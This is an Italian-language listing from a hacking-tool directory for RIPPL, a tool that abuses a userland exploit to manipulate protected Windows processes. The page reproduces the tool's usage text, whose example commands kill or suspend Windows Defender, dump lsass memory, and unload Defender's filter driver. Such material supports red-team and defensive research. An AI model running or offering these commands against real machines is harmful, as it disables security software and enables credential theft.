Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
RIPPL — RIPPL è uno strumento che abusa di un exploit solo in modalità utente per manipolare i processi PPL su Windows | Kitploit
Strumenti/GitHubGitHub/last-byte/rippl
Escalation di PrivilegiExploitPost-ExploitRed Teaming
GitHublast-byte/rippl

RIPPL

RIPPL è uno strumento che abusa di un exploit solo in modalità utente per manipolare i processi PPL su Windows

Vedi Repository
7124 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

RIPPL

Manipolare i processi protetti PPL senza utilizzare un driver

defender funny

Questo strumento implementa un exploit userland per manipolare i processi protetti PPL di Windows. La tecnica è stata inizialmente discussa da James Forshaw (noto anche come @tiraniddo) e Clément Labro (noto anche come @itm4n) nei seguenti articoli del blog.

  • Articolo del blog di James Forshaw: Windows Exploitation Tricks
  • Articolo del blog di Clément Labro parte #1: Do You Really Know About LSA Protection (RunAsPPL)?
  • Articolo del blog di Clément Labro parte #2: Bypassing LSA Protection in Userland

Utilizzo

Avviso: la versione sicura del binario NON produce alcun output, poiché tutte le stringhe e le funzioni di stampa vengono rimosse tramite macro di compilazione condizionale.

È sufficiente eseguire l'eseguibile senza alcun argomento per ottenere un aiuto/uso dettagliato (valido solo per i binari compilati senza definire la macro OPSEC)

root@kitploit:~
c:\Temp>.\rippl.exe
  _____  _____ _____  _____  _
 |  __ \|_   _|  __ \|  __ \| |
 | |__) | | | | |__) | |__) | |      version 0.1
 |  _  /  | | |  ___/|  ___/| |      by @last0x00
 | | \ \ _| |_| |    | |    | |____  forked by itm4n's PPLDump
 |_|  \_\_____|_|    |_|    |______|

Description:
  Manipulate Protected Process Light (PPL) processes with a *userland* exploit

Usage:
  rippl.exe (-D|-K|-S|-R|-L|-X|-W|-Z|-T|-U) [-v] [-d] [-f] (PROC_NAME|PID) [DUMP_FILE|DRIVER_NAME]
  () -> mandatory arguments
  [] -> optional arguments

Operation modes (choose ONLY one):
  -D -> Dump the given process
  -K -> Kill the given process
  -S -> Suspend the given process
  -R -> Resume the previously suspended process
  -L -> Leak a PROCESS_ALL_ACCESS handle to the given process (not yet implemented)
  -X -> Kill the given process by assigning it to a job object and terminating the object
  -W -> Freeze the process by assigning it to a job object and severely constraining its CPU resources
  -Z -> Kill the given process by injecting a thread into it which calls exit(0)
  -T -> Sandbox the process by disabling all of its token's privileges and lowering integrity to untrusted
  -U -> Unload the provided driver

Arguments:
  PROC_NAME   -> The name of the process to interact with
  PID         -> The ID of the process to interact with
  DUMP_FILE   -> The path of the output dump file - valid ONLY with the -D option
  DRIVER_NAME -> The name of the driver to unload - valid ONLY with the -U option

Options:
  -d -> (Debug) Enable debug mode
  -f -> (Force) Bypass DefineDosDevice error check

Examples:
  rippl.exe -K MsMpEng.exe
  rippl.exe -S MsMpEng.exe
  rippl.exe -R MsMpEng.exe
  rippl.exe -D -f lsass.exe lsass.dmp
  rippl.exe -D -d -f 720 out.dmp
  rippl.exe -U Wdfilter
Scarica lo strumento